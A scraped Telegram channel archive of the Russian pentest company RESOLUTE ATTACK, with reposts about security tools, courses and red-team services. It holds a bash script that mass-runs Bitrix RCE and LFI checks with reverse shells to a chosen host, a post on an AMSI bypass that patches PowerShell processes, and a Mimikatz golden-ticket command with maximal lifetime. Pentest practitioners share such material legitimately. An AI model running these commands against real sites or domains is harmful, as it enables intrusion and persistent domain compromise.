RESOLUTE ATTACK
前往频道在 Telegram
⚡️RESOLUTE ATTACK - Компания по информационной безопасности YouTube - https://www.youtube.com/@RESOLUTE-ATTACK Chat - @RESOLUTECHAT Web Site - www.resolute-attack.com Обратная связь - @ResoluteAttack_Bot
显示更多7 299
订阅者
-324 小时
-117 天
-5330 天
帖子存档
7 299
Repost from Похек
🔥 quick-trics_auto.sh
Когда-то я выкладывал пост про интересную тулзу для быстрой проверки Bitrix на наличие простых уязвимостей. И я писал, что мол написал скрипт, но с вами им не поделился 🌚
Исправляюсь! Переписал скрипт, теперь он будет бегать по всем урлам построчно и проверять на всё что только можно из этого инструмента, кроме XSS, т.к. модуль фолзит, из-за того, что нагрузка тупо вставляется и если 200, то он пишет что якобы XSS нашёл, но в 99,999% случаев, сайт просто проглотит нагрузку и ничего не случиться.
#!/bin/bash
echo "Lauch netcat for revshells"
printf "Enter IP ($(curl -s 2ip.ru)): "
read $IP
printf "Enter Port: "
read $PORT
for ((i=1; i <= $(wc -l scope.txt | awk '{print $1;}'); i++))
do
quick-tricks spoofing -u $(sed -n "$i p" scope.txt)
quick-tricks redirect -u $(sed -n "$i p" scope.txt)
quick-tricks lfi -u $(sed -n "$i p" scope.txt)
quick-tricks recon -a -u $(sed -n "$i p" scope.txt)
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 2
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 4
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 7
quick-tricks rce html-editor -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT
done
🍷 Написал скрипт так, чтобы вы его просто запустили, а дальше ушли пить чай.
Но скорее всего у вас вообще не окажется quick-tricks, т.к. автор зачем-то удалил/скрыл репозиторий. Поэтому к этому посту я прикреплю бинарь этого инструмента под Linux.
🌚 @poxek7 299
Repost from SecuriXy.kz
CrackMapExec - все...
переходим на NetExec
Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Execute Tasks on behalf of logged-on Users with Scheduled Tasks, BloodHound now supports computer accounts, FTP Enhancement, Module sorting, WinRM improvements и др
https://www.netexec.wiki
Ставиться проще простого через pipx
apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
Запускается тоже просто
NetExec nxc nxcdb netexec nxcdbДля простоты восприятия можете добавить ~/.zshrc
alias cme=netexec
alias crackmapexec=netexec7 299
Repost from Bafomёd OSINT
Запись вчерашнего стрима, мини обзор web версии.
Запиь в облаке - https://cloud.mail.ru/public/Fr7y/CkhWFerFE
7 299
Repost from 1N73LL1G3NC3
SharpKiller
Lifetime AMSI bypass by
@ZeroMemoryEx ported to .NET Framework 4.8
Live scan for new powershell processes every 0.5 seconds -> Automatically patches new powershell instances7 299
⚡️ Компания RESOLUTE ATTACK поддерживает разработку open source инструментов для пентеста
RA помогает в разработке документации на русском, английском языке и в популяризации инструмента для Lateral Movement - GOST v3
Одной из особенностей нашего инструмента является возможность создания множества цепочек перенаправления, что является Must Have в тестировании AD, и больших корпоративных сетей
Мы также создали бота для обратной связи, где вы можете напрямую обратиться к разработчикам данного инструмента и помочь в улучшении его - @gogostbot
Документация: https://gost.run/en/
GitHub: https://github.com/go-gost/gost
7 299
Уверенно можем сказать, что это потенциальный аналог мальтего в будущем, работы для этого предстоит ещё очень много
7 299
Repost from Bafomёd OSINT
https://t.me/osint_san_framework?livestream=044837696e686ad90d
Стрим по новому инструменту через 40 минут. Обязательно приходим
7 299
RAS-X | SI VIS PACEM, PARA BELLUM | RESOLUTE ACTIVE SECURITY - X
⚡️ Компания RESOLUTE ATTACK представляет уникальное для России предложение и новый продукт RAS X - RESOLUTE ACTIVE SECURITY X
https://youtu.be/EOfbLgUeb9E?feature=shared
7 299
Repost from Schwarz_Osint
Добрый день участник, ты нам нужен!
У нас есть два публичных отдела, отдел расследований и отдел контента. Именно там происходит работа над сообществом и нам нужны люди!
— Отдел Расследований (NPID) занимается расследованиями публичных некоммерческих кейсов, разработкой методологий поиска информации по зарубежью и чуть-чуть черной магией. Если у тебя уже есть опыт в OSINT и ты хочешь развить свои навыки работая в команде, то тебе к нам! Примером его работы является недавний кейс по Ronaldo 18K;
— Отдел Контента (NPCD) занимается формированием новостей, следит за новостями из мира Разведки и всячески формулирует наше видение OSINT-индустрии. Если у тебя есть опыт копирайтинга, редактуры, или тебе интересно разобраться в индустрии, то тебе сюда! Примером его работы является наш ежемесячный #vestnik
Для того что б попасть в нашу команду, пиши: @northen_palmyra
7 299
Немногие знают о существовании фичи которую использовать нельзя, она позволяет создавать бесконечный golden ticket. С грустью вспоминаю те времена, когда можно было создать golden ticket без существующей учётки в домене
Я думаю все знают, что по стандарту золотой билет создаётся на 10 лет. И все понимают, что существуют настраиваемые политики домена. Но командой
/endin: можно корректировать время жизни тикета в минутах
Remi Solberg из offsec выяснил (бородой по круче чем у берсерка), путём не сложной игрой битами, что максимальное время жизни golden ticket - 2147483647 минут. Это примерно 4000 лет. Но детект не заставит вас долго ждать. Или у вас это просто не получится сделать, так как все админы находятся в Protected Users. Использовать не рекомендую
Mimikatz
kerberos::golden /user:user /domain:domain /sid:domainsid /krbtgt:hash /endin:2147483647 /ticket:название
Tadn3wb7 299
Repost from NETRUNNER GROUP
Давненько не было постов, начнем с начала! ⛈
Мы прошли долгий путь от простого Discord сервера до компании, помогающей в изучении такого нелегкого искусства как pentest и взращивающей этичных хакеров.
Мы все еще придерживаемся нашей идеологии и не выкладываем рекламу сомнительных услуг, скама и чернухи.
Мы уважаем и любим каждого нашего подписчика, ведь мы с вами состоим в этом сообществе NETRUNNER GROUP, где вам всегда будут рады.
Уже провели 2 потока по подготовке к сертификации от компании RESOLUTE ATTACK. Было много трудностей, но мы продолжаем работать над этим замечательным проектом, где за хорошую цену вы получите максимум знаний для прохождения сертификации и дальнейшего трудоустройства.
Торжественно анонсируем и стартуем продажи мест на FFPRTT.
Мы решили ограничить количество мест до 15, дабы уделить каждому ученику должное внимание. Наш репетиторский курс не ограничивается теорией и практикой. Мы также придерживаемся традиции проводить занятия F2F с учениками и даем возможность узнать больше чем доступно в материале курса для полного погружения в профессию.
Третий поток сможет познакомиться с нововведениями в обучении, о которых мы расскажем чуть позже.
Третий поток начинается с 16 октября.
Цена остается неизменной.
Цена: 15000Р
Длительность: 2 месяца ( Oct 16.2023 - Dec 16.2024 )
По всем вопросам писать: @netrunner_1G
Весь материал останется с вами, материал улучшается с каждым потоком, это значит что присоединившись к нам однажды , вы получите качество навсегда ❤️
7 299
⚡️ Услуга RED TEAM выходит на новый уровень
Задачи красной команды перед синей, теперь становится многообразней и обширней
RED TEAM X - самый эффективный и информативный вид тестирования служб безопасности организации, ее сервисов, служб, персонала и процессов
Теперь мы можем проверить не только эффективность мер информационной защиты и “Blue Team”, но теперь обладаем обширными возможностями по проверке работы физической службы безопасности, а также физических средств защиты информации
➡️ Подробнее - https://www.resolute-attack.com/Services/Rasx
7 299
Si vis pacem, para bellum
Затишье перед бурей всегда было нашей отличительной чертой. RESOLUTE ATTACK умеет удивлять, и в этот раз мы это доказываем.
🟥 RESOLUTE ATTACK всегда отличалось своим агрессивным и жёстким стилем.
Мы официально заявляем, что мы единственная компания в мире, которая предоставляет высококвалифицированную комплексную безопасность. От информационной до физической.
Представляем вам наше новое направление - RESOLUTE ACTIVE SECURITY X (RAS-X) ⚡️
Команда профессионалов мирового уровня - лучшие в мире, с огромным опытом работы на всех уровнях и опытом успешной работы в реальных боевых действиях, множество государственных наград подтверждающих уровень и признание.
